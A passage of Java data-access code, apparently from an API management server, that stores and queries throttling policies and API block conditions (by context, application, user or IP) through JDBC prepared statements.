updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_BY_UUID_SQL); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement.setString(1, policy.getDescription()); updateStatement.setBinaryStream(2, siddhiQueryInputStream, lengthOfBytes); updateStatement.setString(3, policy.getKeyTemplate()); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(4, policy.getPolicyName()); updateStatement.setInt(5, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(4, policy.getUUID()); } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback the update Global Policy: " + policy.toString(), ex); } } handleException("Failed to update global policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Retrieves list of available policy names under <code>policyLevel</code> * and user <code>username</code>'s tenant * * @param policyLevel policY level to filter policies * @param username username will be used to get the tenant * @return array of policy names * @throws APIManagementException */ public String[] getPolicyNames(String policyLevel, String username) throws APIManagementException { List<String> names = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; int tenantID = APIUtil.getTenantId(username); try { conn = APIMgtDBUtil.getConnection(); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { sqlQuery = SQLConstants.GET_APP_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { sqlQuery = SQLConstants.GET_SUB_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { sqlQuery = SQLConstants.GET_GLOBAL_POLICY_NAMES; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { names.add(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return names.toArray(new String[names.size()]); } /** * Sets deployment status vaule of a policy in database. * * @param policyLevel policy level * @param policyName name of the policy * @param tenantId tenant id of the policy * @param isDeployed deployment status. <code>true</code> if deployment successful, <code>false</code> if not * @throws APIManagementException */ public void setPolicyDeploymentStatus(String policyLevel, String policyName, int tenantId, boolean isDeployed) throws APIManagementException { Connection connection = null; PreparedStatement statusStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.UPDATE_APPLICATION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.UPDATE_API_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.UPDATE_GLOBAL_POLICY_STATUS_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); statusStatement = connection.prepareStatement(query); statusStatement.setBoolean(1, isDeployed); statusStatement.setString(2, policyName); statusStatement.setInt(3, tenantId); statusStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback setting isDeployed flag: " + policyName + '-' + tenantId, ex); } } handleException("Failed to set deployment status to the policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(statusStatement, connection, null); } } /** * Populates common attribute data of the <code>policy</code> to <code>policyStatement</code> * * @param policyStatement prepared statement initialized of policy operation * @param policy <code>Policy</code> object with data * @throws SQLException */ private void setCommonParametersForPolicy(PreparedStatement policyStatement, Policy policy) throws SQLException { policyStatement.setString(1, policy.getPolicyName()); if (!StringUtils.isEmpty(policy.getDisplayName())) { policyStatement.setString(2, policy.getDisplayName()); } else { policyStatement.setString(2, policy.getPolicyName()); } policyStatement.setInt(3, policy.getTenantId()); policyStatement.setString(4, policy.getDescription()); policyStatement.setString(5, policy.getDefaultQuotaPolicy().getType()); //TODO use requestCount in same format in all places if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getRequestCount()); policyStatement.setString(7, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getDataAmount()); policyStatement.setString(7, limit.getDataUnit()); } policyStatement.setLong(8, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); policyStatement.setString(9, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); //policyStatement.setBoolean(9, APIUtil.isContentAwarePolicy(policy)); policyStatement.setBoolean(10, policy.isDeployed()); if (!StringUtils.isBlank(policy.getUUID())) { policyStatement.setString(11, policy.getUUID()); } else { policyStatement.setString(11, UUID.randomUUID().toString()); } } /** * Populated common attributes of policy type objects to <code>policy</code> * from <code>resultSet</code> * * @param policy initiallized {@link Policy} object to populate * @param resultSet {@link ResultSet} with data to populate <code>policy</code> * @throws SQLException */ private void setCommonPolicyDetails(Policy policy, ResultSet resultSet) throws SQLException { QuotaPolicy quotaPolicy = new QuotaPolicy(); String prefix = ""; if (policy instanceof APIPolicy) { prefix = "DEFAULT_"; } quotaPolicy.setType(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.REQUEST_COUNT_TYPE)) { RequestCountLimit reqLimit = new RequestCountLimit(); reqLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); reqLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); reqLimit.setRequestCount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); quotaPolicy.setLimit(reqLimit); } else if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.BANDWIDTH_TYPE)) { BandwidthLimit bandLimit = new BandwidthLimit(); bandLimit.setUnitTime(resultSet.getInt(prefix + 
ThrottlePolicyConstants.COLUMN_UNIT_TIME)); bandLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); bandLimit.setDataAmount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); bandLimit.setDataUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_UNIT)); quotaPolicy.setLimit(bandLimit); } policy.setUUID(resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID)); policy.setDescription(resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); policy.setDisplayName(resultSet.getString(ThrottlePolicyConstants.COLUMN_DISPLAY_NAME)); policy.setPolicyId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); policy.setTenantId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); policy.setTenantDomain(IdentityTenantUtil.getTenantDomain(policy.getTenantId())); policy.setDefaultQuotaPolicy(quotaPolicy); policy.setDeployed(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); } public boolean isPolicyExist(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isExist = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_ID + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isExist = true; } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isExist; } public boolean isPolicyDeployed(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isDeployed = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_IS_DEPLOYED + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? 
"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isDeployed = result.getBoolean(PolicyConstants.POLICY_IS_DEPLOYED); } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isDeployed; } /** * Add a block condition * * @param conditionType Type of the block condition * @param conditionValue value related to the type * @param tenantDomain tenant domain the block condition should be effective * @return uuid of the block condition if successfully added * @throws APIManagementException */ public String addBlockConditions(String conditionType, String conditionValue, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement insertPreparedStatement = null; boolean status = false; boolean valid = false; ResultSet rs = null; String uuid = null; try { String query = SQLConstants.ThrottleSQLConstants.ADD_BLOCK_CONDITIONS_SQL; if (APIConstants.BLOCKING_CONDITIONS_API.equals(conditionType)) { String extractedTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(conditionValue); if (extractedTenantDomain == null) { extractedTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } if (tenantDomain.equals(extractedTenantDomain) && isValidContext(conditionValue)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid API Context " + conditionValue); } } else if (APIConstants.BLOCKING_CONDITIONS_APPLICATION.equals(conditionType)) { String appArray[] = conditionValue.split(":"); if (appArray.length > 1) { String appOwner = appArray[0]; String appName = appArray[1]; if ((MultitenantUtils.getTenantDomain(appOwner).equals(tenantDomain)) && isValidApplication(appOwner, appName)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid Application " + "name " + appName + " from Application " + "Owner " + appOwner); } } } else if (APIConstants.BLOCKING_CONDITIONS_USER.equals(conditionType)) { if (MultitenantUtils.getTenantDomain(conditionValue).equals(tenantDomain)) { valid = true; } else { throw new APIManagementException("Invalid User in Tenant Domain " + tenantDomain); } } else if (APIConstants.BLOCKING_CONDITIONS_IP.equals(conditionType)) { valid = true; } if (valid) { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!isBlockConditionExist(conditionType, conditionValue, tenantDomain, connection)) { uuid = UUID.randomUUID().toString(); insertPreparedStatement = connection.prepareStatement(query); insertPreparedStatement.setString(1, conditionType); insertPreparedStatement.setString(2, conditionValue); insertPreparedStatement.setString(3, "TRUE"); insertPreparedStatement.setString(4, tenantDomain); insertPreparedStatement.setString(5, uuid); status = insertPreparedStatement.execute(); connection.commit(); status = true; } else { throw new BlockConditionAlreadyExistsException( "Condition with type: " + conditionType + ", value: " + conditionValue + " already exists"); } } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback adding Block condition 
: " + conditionType + " and " + conditionValue, ex); } } handleException("Failed to add Block condition : " + conditionType + " and " + conditionValue, e); } finally { APIMgtDBUtil.closeAllConnections(insertPreparedStatement, connection, null); } if (status) { return uuid; } else { return null; } } /** * Get details of a block condition by Id * * @param conditionId id of the condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setInt(1, conditionId); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(conditionId); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition with id " + conditionId, ex); } } handleException("Failed to get Block condition with id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } /** * Get details of a block condition by UUID * * @param uuid uuid of the block condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, uuid); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(resultSet.getInt("CONDITION_ID")); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition by uuid " + uuid, ex); } } handleException("Failed to get Block condition by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } public List<BlockConditionsDTO> getBlockConditions(String tenantDomain) throws APIManagementException { Connection connection = null; 
PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; List<BlockConditionsDTO> blockConditionsDTOList = new ArrayList<BlockConditionsDTO>(); try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITIONS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, tenantDomain); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { BlockConditionsDTO blockConditionsDTO = new BlockConditionsDTO(); blockConditionsDTO.setEnabled(resultSet.getBoolean("ENABLED")); blockConditionsDTO.setConditionType(resultSet.getString("TYPE")); blockConditionsDTO.setConditionValue(resultSet.getString("VALUE")); blockConditionsDTO.setConditionId(resultSet.getInt("CONDITION_ID")); blockConditionsDTO.setUUID(resultSet.getString("UUID")); blockConditionsDTO.setTenantDomain(resultSet.getString("DOMAIN")); blockConditionsDTOList.add(blockConditionsDTO); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block conditions ", ex); } } handleException("Failed to get Block conditions", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockConditionsDTOList; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param conditionId id of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionState(int conditionId, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setInt(2, conditionId); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition id " + conditionId, ex); } } handleException("Failed to update Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param uuid UUID of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionStateByUUID(String uuid, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); 
updateBlockConditionPreparedStatement.setString(2, uuid); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition UUID " + uuid, ex); } } handleException("Failed to update Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param conditionId id of the condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setInt(1, conditionId); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition id " + conditionId, ex); } } handleException("Failed to delete Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param uuid UUID of the block condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setString(1, uuid); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition UUID " + uuid, ex); } } handleException("Failed to delete Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } private boolean isValidContext(String context) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "select count(*) COUNT from AM_API where CONTEXT=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, context); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next() && 
resultSet.getInt("COUNT") > 0) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback checking Block condition with context " + context, ex); } } handleException("Failed to check Block condition with context " + context, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } private boolean isValidApplication(String appOwner, String appName) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "SELECT * FROM AM_APPLICATION App,AM_SUBSCRIBER SUB WHERE App.NAME=? AND App" + ".SUBSCRIBER_ID=SUB.SUBSCRIBER_ID AND SUB.USER_ID=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, appName); validateContextPreparedStatement.setString(2, appOwner); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next()) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback checking Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, ex); } } handleException("Failed to check Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } public String getAPILevelTier(int id) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; String apiLevelTier = null; try { String query = SQLConstants.GET_API_DETAILS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query + " WHERE API_ID = ?"); selectPreparedStatement.setInt(1, id); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { apiLevelTier = resultSet.getString("API_TIER"); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting API Details", ex); } } handleException("Failed to get API Details", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return apiLevelTier; } private boolean isBlockConditionExist(String conditionType, String conditionValue, String tenantDomain, Connection connection) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; ResultSet checkIsResultSet = null; boolean status = false; try { String isExistQuery = SQLConstants.ThrottleSQLConstants.BLOCK_CONDITION_EXIST_SQL; checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tenantDomain); checkIsExistPreparedStatement.setString(2, conditionType); checkIsExistPreparedStatement.setString(3, conditionValue); checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); connection.commit(); if (checkIsResultSet.next()) { status = true; } } catch (SQLException e) { String msg = "Couldn't check the Block Condition Exist"; log.error(msg, e); 
handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, null, checkIsResultSet); } return status; } public boolean hasSubscription(String tierId, String tenantDomainWithAt, String policyLevel) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; Connection connection = null; ResultSet checkIsResultSet = null; boolean status = false; try { /*String apiProvider = tenantId;*/ connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); String isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_RESOURCES_API; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_APPLICATION; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; } checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tierId); checkIsExistPreparedStatement.setString(2, "%" + tenantDomainWithAt); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { checkIsExistPreparedStatement.setString(3, tierId); checkIsExistPreparedStatement.setString(4, "%" + tenantDomainWithAt); } checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); if (checkIsResultSet != null && checkIsResultSet.next()) { int count = checkIsResultSet.getInt(1); if (count > 0) { status = true; } } connection.setAutoCommit(true); } catch (SQLException e) { String msg = "Couldn't check Subscription Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, connection, checkIsResultSet); } return status; } /** * Get a list of access tokens issued for given user under the given app of given owner. 
Returned object carries * consumer key and secret information related to the access token * * @param userName end user name * @param appName application name * @param appOwner application owner user name * @return list of tokens * @throws SQLException in case of a DB issue */ public static List<AccessTokenInfo> getAccessTokenListForUser(String userName, String appName, String appOwner) throws SQLException { List<AccessTokenInfo> accessTokens = new ArrayList<AccessTokenInfo>(5); Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement consumerSecretIDPS = connection.prepareStatement(SQLConstants.GET_ACCESS_TOKENS_BY_USER_SQL); consumerSecretIDPS.setString(1, userName); consumerSecretIDPS.setString(2, appName); consumerSecretIDPS.setString(3, appOwner); ResultSet consumerSecretIDResult = consumerSecretIDPS.executeQuery(); while (consumerSecretIDResult.next()) { String consumerKey = consumerSecretIDResult.getString(1); String consumerSecret = consumerSecretIDResult.getString(2); String accessToken = consumerSecretIDResult.getString(3); AccessTokenInfo accessTokenInfo = new AccessTokenInfo(); accessTokenInfo.setConsumerKey(consumerKey); accessTokenInfo.setConsumerSecret(consumerSecret); accessTokenInfo.setAccessToken(accessToken); accessTokens.add(accessTokenInfo); } return accessTokens; } public String[] getAPIDetailsByContext(String context) { String apiName = ""; String apiProvider = ""; String sql = SQLConstants.GET_API_FOR_CONTEXT_TEMPLATE_SQL; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); rs = ps.executeQuery(); if (rs.next()) { apiName = rs.getString("API_NAME"); apiProvider = rs.getString("API_PROVIDER"); } } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return new String[]{apiName, apiProvider}; } /** * Check for the subscription of the user * * @param infoDTO * @param context * @param version * @param consumerKey * @return APIKeyValidationInfoDTO including data of api and application * @throws APIManagementException */ public APIKeyValidationInfoDTO validateSubscriptionDetails(APIKeyValidationInfoDTO infoDTO, String context, String version, String consumerKey, boolean defaultVersionInvoked) throws APIManagementException { String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if 
